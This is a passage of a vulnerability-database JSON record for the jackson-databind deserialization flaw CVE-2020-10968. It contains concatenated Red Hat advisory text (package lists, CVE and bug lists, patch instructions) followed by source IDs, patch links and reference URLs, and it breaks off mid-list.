_dynflow_core-0.2.6-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.noarch.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.noarch.rpm\ntfm-rubygem-sprockets-3.7.2-6.el7sat.noarch.rpm\ntfm-rubygem-sprockets-rails-3.2.1-6.el7sat.noarch.rpm\ntfm-rubygem-sshkey-1.9.0-3.el7sat.noarch.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.noarch.rpm\ntfm-rubygem-stomp-1.4.9-1.el7sat.noarch.rpm\ntfm-rubygem-text-1.3.0-7.el7sat.noarch.rpm\ntfm-rubygem-thor-1.0.1-2.el7sat.noarch.rpm\ntfm-rubygem-thread_safe-0.3.6-5.el7sat.noarch.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.noarch.rpm\ntfm-rubygem-timeliness-0.3.10-1.el7sat.noarch.rpm\ntfm-rubygem-tzinfo-1.2.6-1.el7sat.noarch.rpm\ntfm-rubygem-uber-0.1.0-1.el7sat.noarch.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.noarch.rpm\ntfm-rubygem-unicode-display_width-1.0.5-5.el7sat.noarch.rpm\ntfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.noarch.rpm\ntfm-rubygem-webpack-rails-0.9.8-6.el7sat.noarch.rpm\ntfm-rubygem-websocket-extensions-0.1.5-1.el7sat.noarch.rpm\ntfm-rubygem-will_paginate-3.1.7-3.el7sat.noarch.rpm\ntfm-rubygem-x-editable-rails-1.5.5-5.el7sat.noarch.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.noarch.rpm\ntfm-rubygem-zeitwerk-2.2.2-1.el7sat.noarch.rpm\n\nx86_64:\ncreaterepo_c-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-debuginfo-0.7.4-1.el7sat.x86_64.rpm\ncreaterepo_c-libs-0.7.4-1.el7sat.x86_64.rpm\nforeman-discovery-image-service-1.0.0-3.el7sat.x86_64.rpm\nforeman-discovery-image-service-tui-1.0.0-3.el7sat.x86_64.rpm\nhfsplus-tools-332.14-12.el7.x86_64.rpm\nhfsplus-tools-debuginfo-332.14-12.el7.x86_64.rpm\nlibmodulemd-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibmodulemd-debuginfo-1.7.0-1.pulp.el7sat.x86_64.rpm\nlibsolv-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibsolv-debuginfo-0.7.4-4.pulp.el7sat.x86_64.rpm\nlibwebsockets-2.4.2-2.el7.x86_64.rpm\nlibwebsockets-debuginfo-2.4.2-2.el7.x86_64.rpm\nlivecd-tools-20.4-1.6.el7sat.x86_64.rpm\nmod_passenger-4.0.18-24.el7sat.x86_64.rpm\nmod_xsendfile-0.12-11.el7sat.x86_64.rpm\nmod_xsendfile-debuginfo-0.12-11.el7sat.x86_64.rpm\nostree-2017.1-2.atomic.el7.x86_64.rpm\nostree-debuginfo-2017.1-2.atomic.el7.x86_64.rpm\npcp-mmvstatsd-0.4-2.el7sat.x86_64.rpm\npuppet-agent-6.14.0-2.el7sat.x86_64.rpm\npycairo-1.16.3-9.el7sat.x86_64.rpm\npycairo-debuginfo-1.16.3-9.el7sat.x86_64.rpm\npygobject3-debuginfo-3.28.3-2.el7sat.x86_64.rpm\npython-aiohttp-debuginfo-3.6.2-4.el7ar.x86_64.rpm\npython-billiard-debuginfo-3.5.0.3-3.el7sat.x86_64.rpm\npython-bson-3.2-2.el7sat.x86_64.rpm\npython-imgcreate-20.4-1.6.el7sat.x86_64.rpm\npython-markupsafe-debuginfo-0.23-21.el7sat.x86_64.rpm\npython-multidict-debuginfo-4.7.4-2.el7ar.x86_64.rpm\npython-psutil-5.0.1-3.el7sat.x86_64.rpm\npython-psutil-debuginfo-5.0.1-3.el7sat.x86_64.rpm\npython-pycurl-debuginfo-7.43.0.2-4.el7sat.x86_64.rpm\npython-pymongo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-debuginfo-3.2-2.el7sat.x86_64.rpm\npython-pymongo-gridfs-3.2-2.el7sat.x86_64.rpm\npython-qpid-proton-0.28.0-3.el7.x86_64.rpm\npython-qpid-qmf-1.36.0-28.el7amq.x86_64.rpm\npython-saslwrapper-0.22-5.el7sat.x86_64.rpm\npython-simplejson-3.2.0-1.el7sat.x86_64.rpm\npython-simplejson-debuginfo-3.2.0-1.el7sat.x86_64.rpm\npython-twisted-debuginfo-16.4.1-12.el7sat.x86_64.rpm\npython-yarl-debuginfo-1.4.2-2.el7ar.x86_64.rpm\npython-zope-interface-4.0.5-4.el7.x86_64.rpm\npython-zope-interface-debuginfo-4.0.5-4.el7.x86_64.rpm\npython2-billiard-3.5.0.3-3.el7sat.x86_64.rpm\npython2-gobject-3.28.3-2.el7sat.x86_64.rpm\npython2-gobject-base-3.28.3-2.el7sat.x86_64.rpm\npython2-markupsafe-0.23-21.el7sat.x86_64.rpm\npython2-pycurl-7.43.0.2-4.el7sat.x86_64.rpm\npython2-solv-0.7.4-4.pulp.el7sat.x86_64.rpm\npython2-twisted-16.4.1-12.el7sat.x86_64.rpm\npython3-aiohttp-3.6.2-4.el7ar.x86_64.rpm\npython3-multidict-4.7.4-2.el7ar.x86_64.rpm\npython3-yarl-1.4.2-2.el7ar.x86_64.rpm\nqpid-cpp-client-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-client-devel-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-debuginfo-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-1.36.0-28.el7amq.x86_64.rpm\nqpid-cpp-server-linearstore-1.36.0-28.el7amq.x86_64.rpm\nqpid-dispatch-debuginfo-1.5.0-4.el7.x86_64.rpm\nqpid-dispatch-router-1.5.0-4.el7.x86_64.rpm\nqpid-proton-c-0.28.0-3.el7.x86_64.rpm\nqpid-proton-debuginfo-0.28.0-3.el7.x86_64.rpm\nqpid-qmf-1.36.0-28.el7amq.x86_64.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.x86_64.rpm\nrubygem-facter-2.4.1-2.el7sat.x86_64.rpm\nrubygem-newt-0.9.6-3.el7sat.x86_64.rpm\nrubygem-newt-debuginfo-0.9.6-3.el7sat.x86_64.rpm\nrubygem-passenger-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-debuginfo-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-native-4.0.18-24.el7sat.x86_64.rpm\nrubygem-passenger-native-libs-4.0.18-24.el7sat.x86_64.rpm\nsaslwrapper-0.22-5.el7sat.x86_64.rpm\nsaslwrapper-debuginfo-0.22-5.el7sat.x86_64.rpm\ntfm-rubygem-bcrypt-3.1.12-1.el7sat.x86_64.rpm\ntfm-rubygem-bcrypt-debuginfo-3.1.12-1.el7sat.x86_64.rpm\ntfm-rubygem-facter-2.4.0-6.el7sat.x86_64.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-ffi-debuginfo-1.12.2-1.el7sat.x86_64.rpm\ntfm-rubygem-http_parser.rb-0.6.0-1.el7sat.x86_64.rpm\ntfm-rubygem-http_parser.rb-debuginfo-0.6.0-1.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-journald-native-debuginfo-1.0.11-2.el7sat.x86_64.rpm\ntfm-rubygem-nio4r-2.5.2-2.el7sat.x86_64.rpm\ntfm-rubygem-nio4r-debuginfo-2.5.2-2.el7sat.x86_64.rpm\ntfm-rubygem-nokogiri-1.10.9-1.el7sat.x86_64.rpm\ntfm-rubygem-nokogiri-debuginfo-1.10.9-1.el7sat.x86_64.rpm\ntfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.x86_64.rpm\ntfm-rubygem-ovirt-engine-sdk-debuginfo-4.2.3-3.el7sat.x86_64.rpm\ntfm-rubygem-passenger-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-debuginfo-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-native-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-passenger-native-libs-4.0.18-26.el7sat.x86_64.rpm\ntfm-rubygem-pg-1.1.4-2.el7sat.x86_64.rpm\ntfm-rubygem-pg-debuginfo-1.1.4-2.el7sat.x86_64.rpm\ntfm-rubygem-puma-4.3.3-4.el7sat.x86_64.rpm\ntfm-rubygem-puma-debuginfo-4.3.3-4.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-rkerberos-debuginfo-0.1.5-18.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-ruby-libvirt-debuginfo-0.7.0-4.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-sqlite3-debuginfo-1.3.13-5.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unf_ext-debuginfo-0.0.7.2-1.el7sat.x86_64.rpm\ntfm-rubygem-unicode-0.4.4.4-1.el7sat.x86_64.rpm\ntfm-rubygem-unicode-debuginfo-0.4.4.4-1.el7sat.x86_64.rpm\ntfm-rubygem-websocket-driver-0.7.1-1.el7sat.x86_64.rpm\ntfm-rubygem-websocket-driver-debuginfo-0.7.1-1.el7sat.x86_64.rpm\ntfm-runtime-6.1-1.el7sat.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2018-3258\nhttps://access.redhat.com/security/cve/CVE-2018-11751\nhttps://access.redhat.com/security/cve/CVE-2019-12781\nhttps://access.redhat.com/security/cve/CVE-2019-16782\nhttps://access.redhat.com/security/cve/CVE-2020-5216\nhttps://access.redhat.com/security/cve/CVE-2020-5217\nhttps://access.redhat.com/security/cve/CVE-2020-5267\nhttps://access.redhat.com/security/cve/CVE-2020-7238\nhttps://access.redhat.com/security/cve/CVE-2020-7663\nhttps://access.redhat.com/security/cve/CVE-2020-7942\nhttps://access.redhat.com/security/cve/CVE-2020-7943\nhttps://access.redhat.com/security/cve/CVE-2020-8161\nhttps://access.redhat.com/security/cve/CVE-2020-8184\nhttps://access.redhat.com/security/cve/CVE-2020-8840\nhttps://access.redhat.com/security/cve/CVE-2020-9546\nhttps://access.redhat.com/security/cve/CVE-2020-9547\nhttps://access.redhat.com/security/cve/CVE-2020-9548\nhttps://access.redhat.com/security/cve/CVE-2020-10693\nhttps://access.redhat.com/security/cve/CVE-2020-10968\nhttps://access.redhat.com/security/cve/CVE-2020-10969\nhttps://access.redhat.com/security/cve/CVE-2020-11619\nhttps://access.redhat.com/security/cve/CVE-2020-14061\nhttps://access.redhat.com/security/cve/CVE-2020-14062\nhttps://access.redhat.com/security/cve/CVE-2020-14195\nhttps://access.redhat.com/security/cve/CVE-2020-14334\nhttps://access.redhat.com/security/cve/CVE-2020-14380\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2020 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBX5gpEdzjgjWX9erEAQgmXRAAjIzb5ngtDgGHNv75R+NwkGD3jzRe/GfK\n1DDrOBxGaminKY9q+hGwwJOGrMbr2gcfu+VtuFgUTaxFjbfml6Lsju9czOPSL+Wa\n5vIcvaUObLQEwmW5hP7ZIqzZvm0UlbSgHEsv7tYwIWkITIg54p2fQzRUuSH8nRhr\noomd60Mv8Ayv6IdogtiNDdv8B7avsNQrbtzf60HGtyZlX8Rro2Wy8gosbfsGl10f\nZ8Nc+tVwWdkdpFjcMtwmYIDtecgwxMmo3FMJRtkSrQ2VldZB9mjFj/WyfZOfV3Io\nOhoAiLFzi52dC68an5/VFnzZWxdOmYjqm4rBZ2MLnw/wn4jH2WOgjK5VBJUW+nmX\nk9pQLGrKlLQeYSVY9Je9Maxz1POajFEV1u+ByAVDBm1xBJMhlTEcTwbHt1X0jLzG\nC2CSzCY8Urz2j1SvYrcrBdNGSqK1wvMwDL7V7lEpaFd/dGE+JwbrOB6z2iYr3de5\n/6nh/jeWFi16C0Z8FbYe021edVuzbzCITbz+UdThAITmROcE7Q6ysDPcvToANfta\nD2gChuqVhmTWJ9YDeQTWiErQLY4OJfklPd/5L/sIZqoZpV8B+5bTHTKsCiisyj1a\nf4PVZiu+CQoxHuj45rTwRLLfP9+SmJpFz+JsId6rKQ2hrzZ4DzB9srzyewd2TfvG\n1yK/tAm1KBU=osSG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. \n\nNOTE: This advisory is an addendum to\nhttps://access.redhat.com/errata/RHBA-2020:1414 and is an informational\nadvisory only, to clarify security fixes released therein. No code has been\nmodified as part of this advisory. Description:\n\nRed Hat Single Sign-On 7.4 is a standalone server, based on the Keycloak\nproject, that provides authentication and standards-based single sign-on\ncapabilities for web and mobile applications. Summary:\n\nThis is a security update for JBoss EAP Continuous Delivery 19. JIRA issues fixed (https://issues.jboss.org/):\n\nJBEAP-18881 - Upgrade Undertow to 2.0.30.SP1\nJBEAP-18974 - Upgrade snakeyaml to 1.26\nJBEAP-18975 - Upgrade cryptacular to 1.2.4\nJBEAP-18982 - Upgrade WildFly Core to 11.0.0.Final-redhat-00001\nJBEAP-18983 - Upgrade Remoting JMX from 3.0.3 to 3.0.4\nJBEAP-19041 - Upgrade WildFly Elytron to 1.11.3.Final\nJBEAP-19042 - Upgrade wildfly-core to 11.0.2.Final\nJBEAP-19076 - Upgrade resteasy from 3.11.0.Final to 3.11.1.Final\nJBEAP-19211 - Empty section Fixed CVEs in CD19 Release Notes\n\n6. Description:\n\nRed Hat Process Automation Manager is an open source business process\nmanagement suite that combines process management and decision service\nmanagement and enables business and IT users to create, manage, validate,\nand deploy process applications and decision services. Solution:\n\nTo install this update, do the following:\n\n1. Download the Data Grid 7.3.7 server patch from the customer portal. Back up your existing Data Grid installation. You should back up\ndatabases, configuration files, and so on. Install the Data Grid 7.3.7 server patch. Refer to the 7.3 Release Notes\nfor patching instructions. Restart Data Grid to ensure the changes take effect. Bugs fixed (https://bugzilla.redhat.com/):\n\n1595621 - CVE-2017-7658 jetty: Incorrect header handling\n1715075 - CVE-2019-10172 jackson-mapper-asl: XML external entity similar to CVE-2016-3720\n1730462 - CVE-2020-1695 resteasy: Improper validation of response header in MediaTypeHeaderDelegate.java class\n1752770 - CVE-2020-1757 undertow: servletPath is normalized incorrectly leading to dangerous application mapping which could result in security bypass\n1793970 - CVE-2020-1710 EAP: field-name is not parsed in accordance to RFC7230\n1796617 - CVE-2020-1719 Wildfly: EJBContext principal is not popped back after invoking another EJB using a different Security Domain\n1807305 - CVE-2020-1745 undertow: AJP File Read/Inclusion Vulnerability\n1807707 - CVE-2020-1748 Wildfly: Improper authorization issue in WildFlySecurityManager when using alternative protection domain\n1815470 - CVE-2020-10673 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1815495 - CVE-2020-10672 jackson-databind: mishandles the interaction between serialization gadgets and typing which could result in remote command execution\n1816216 - CVE-2020-11612 netty: compression/decompression codecs don\u0027t enforce limits on buffer allocation sizes\n1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking\n1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config\n1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap\n1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n1825714 - CVE-2020-10714 wildfly-elytron: session fixation when using FORM authentication\n1826798 - CVE-2020-11620 jackson-databind: Serialization gadgets in commons-jelly:commons-jelly\n1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop\n1831139 - CVE-2020-9488 log4j: improper validation of certificate with host mismatch in SMTP appender\n\n5. \nThe purpose of this text-only errata is to inform you about the security\nissues fixed in this release. \n\nInstallation instructions are available from the Fuse 7.7.0 product\ndocumentation page:\nhttps://access.redhat.com/documentation/en-us/red_hat_fuse/7.7/\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1343616 - CVE-2016-4970 netty: Infinite loop vulnerability when handling renegotiation using SslProvider.OpenSsl\n1620529 - CVE-2018-1000632 dom4j: XML Injection in Class: Element. Methods: addElement, addAttribute which can impact the integrity of XML documents\n1632452 - CVE-2018-3831 elasticsearch: Information exposure via _cluster/settings API\n1637492 - CVE-2018-11797 pdfbox: unbounded computation in parser resulting in a denial of service\n1638391 - CVE-2018-12541 vertx: WebSocket HTTP upgrade implementation holds the entire http request in memory before the handshake\n1697598 - CVE-2019-3797 spring-data-jpa: Additional information exposure with Spring Data JPA derived queries\n1700016 - CVE-2019-0231 mina-core: Retaining an open socket in close_notify SSL-TLS leading to Information disclosure. \n1713468 - CVE-2019-12086 jackson-databind: polymorphic typing issue allows attacker to read arbitrary local files on the server. 7) - noarch\n\n3. Description:\n\nThe jackson-databind package provides general data-binding functionality\nfor Jackson, which works on top of Jackson core streaming API. \n\nSecurity Fix(es):\n\n* jackson-databind: Serialization gadgets in\norg.aoju.bus.proxy.provider.*.RmiProvider (CVE-2020-10968)\n\n* jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n(CVE-2020-10969)\n\n* jackson-databind: Serialization gadgets in\norg.apache.activemq.jms.pool.XaPooledConnectionFactory (CVE-2020-11111)\n\n* jackson-databind: Serialization gadgets in\norg.apache.commons.proxy.provider.remoting.RmiProvider (CVE-2020-11112)\n\n* jackson-databind: Serialization gadgets in\norg.apache.openjpa.ee.WASRegistryManagedRuntime (CVE-2020-11113)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider.*.RmiProvider\n1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane\n1821304 - CVE-2020-11111 jackson-databind: Serialization gadgets in org.apache.activemq.jms.pool.XaPooledConnectionFactory\n1821311 - CVE-2020-11112 jackson-databind: Serialization gadgets in org.apache.commons.proxy.provider.remoting.RmiProvider\n1821315 - CVE-2020-11113 jackson-databind: Serialization gadgets in org.apache.openjpa.ee.WASRegistryManagedRuntime\n\n6",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-10968"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
},
{
"db": "VULHUB",
"id": "VHN-163499"
},
{
"db": "VULMON",
"id": "CVE-2020-10968"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
}
],
"trust": 2.52
},
"external_ids": {
"_id": null,
"data": [
{
"db": "NVD",
"id": "CVE-2020-10968",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "159208",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "158651",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "157322",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "159724",
"trust": 0.8
},
{
"db": "PACKETSTORM",
"id": "160601",
"trust": 0.8
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003420",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1625",
"trust": 0.7
},
{
"db": "PACKETSTORM",
"id": "157859",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2020.1399",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1766",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2588",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.4471",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3190",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1368",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.3703",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.1882",
"trust": 0.6
},
{
"db": "AUSCERT",
"id": "ESB-2020.2619",
"trust": 0.6
},
{
"db": "CS-HELP",
"id": "SB2022060909",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "48376",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "158650",
"trust": 0.1
},
{
"db": "CNVD",
"id": "CNVD-2020-24033",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-163499",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2020-10968",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "157741",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "158636",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163499"
},
{
"db": "VULMON",
"id": "CVE-2020-10968"
},
{
"db": "PACKETSTORM",
"id": "157741"
},
{
"db": "PACKETSTORM",
"id": "159724"
},
{
"db": "PACKETSTORM",
"id": "160601"
},
{
"db": "PACKETSTORM",
"id": "157859"
},
{
"db": "PACKETSTORM",
"id": "158651"
},
{
"db": "PACKETSTORM",
"id": "159208"
},
{
"db": "PACKETSTORM",
"id": "158636"
},
{
"db": "PACKETSTORM",
"id": "157322"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1625"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
},
{
"db": "NVD",
"id": "CVE-2020-10968"
}
]
},
"id": "VAR-202003-1777",
"iot": {
"_id": null,
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-163499"
}
],
"trust": 0.01
},
"last_update_date": "2026-03-09T20:08:44.305000Z",
"patch": {
"_id": null,
"data": [
{
"title": "Block one more gadget type (bus-proxy, CVE-2020-10968) #2662",
"trust": 0.8,
"url": "https://github.com/FasterXML/jackson-databind/issues/2662"
},
{
"title": "FasterXML jackson-databind Fixes for code issue vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=115309"
},
{
"title": "Red Hat: Moderate: Red Hat Single Sign-On 7.4.0 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20205625 - Security Advisory"
},
{
"title": "Red Hat: Important: rh-maven35-jackson-databind security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20201523 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Data Grid 7.3.7 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203779 - Security Advisory"
},
{
"title": "Red Hat: Important: EAP Continuous Delivery Technical Preview Release 19 security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202333 - Security Advisory"
},
{
"title": "Red Hat: Important: Satellite 6.8 release",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20204366 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Process Automation Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203197 - Security Advisory"
},
{
"title": "IBM: Security Bulletin: Multiple Security Vulnerabilities in Jackson-Databind Affect IBM Sterling B2B Integrator",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=9bb4efe27af18414a7db703d1dd40070"
},
{
"title": "Red Hat: Important: Red Hat Decision Manager 7.8.0 Security Update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203196 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat build of Thorntail 2.5.1 security and bug fix update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20202067 - Security Advisory"
},
{
"title": "Red Hat: Important: Red Hat Fuse 7.7.0 release and security update",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=RHSA-20203192 - Security Advisory"
},
{
"title": "Hitachi Security Advisories: Multiple Vulnerabilities in Cosminexus",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=hitachi_security_advisories\u0026qid=hitachi-sec-2021-109"
},
{
"title": "IBM: Security Bulletin: z/Transaction Processing Facility is affected by multiple vulnerabilities in the jackson-databind, jackson-dataformat-xml, jackson-core, slf4j-ext, and cxf-core packages",
"trust": 0.1,
"url": "https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog\u0026qid=f974282a27702bae4111bf7716ee6cf6"
},
{
"title": "cubed",
"trust": 0.1,
"url": "https://github.com/yahoo/cubed "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2020-10968"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-1625"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
}
]
},
"problemtype_data": {
"_id": null,
"data": [
{
"problemtype": "CWE-502",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-163499"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-003420"
},
{
"db": "NVD",
"id": "CVE-2020-10968"
}
]
},
"references": {
"_id": null,
"data": [
{
"trust": 2.0,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10968"
},
{
"trust": 1.8,
"url": "https://security.netapp.com/advisory/ntap-20200403-0002/"
},
{
"trust": 1.8,
"url": "https://github.com/fasterxml/jackson-databind/issues/2662"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujan2021.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpujul2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2020.html"
},
{
"trust": 1.8,
"url": "https://www.oracle.com/security-alerts/cpuoct2021.html"
},
{
"trust": 1.8,
"url": "https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"
},
{
"trust": 1.0,
"url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/cve/cve-2020-10968"
},
{
"trust": 0.8,
"url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.8,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.8,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-10968"
},
{
"trust": 0.7,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-security-vulnerabilities-in-jackson-databind-affect-ibm-sterling-b2b-integrator-3/"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11112"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11113"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-10969"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/cve/cve-2020-11111"
},
{
"trust": 0.7,
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-11619"
},
{
"trust": 0.6,
"url": "https://access.redhat.com/security/cve/cve-2020-9547"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.1368/"
},
{
"trust": 0.6,
"url": "https://www.cybersecurity-help.cz/vdb/sb2022060909"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-series-of-vulnerabilities-in-fasterxml-jackson-databind-affect-apache-solr-shipped-with-ibm-operations-analytics-log-analysis/"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2020.3703/"
},
{
"trust": 0.6,
"url": "https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-in-jackson-databind-shipped-with-ibm-cloud-pak-system/"
},
{
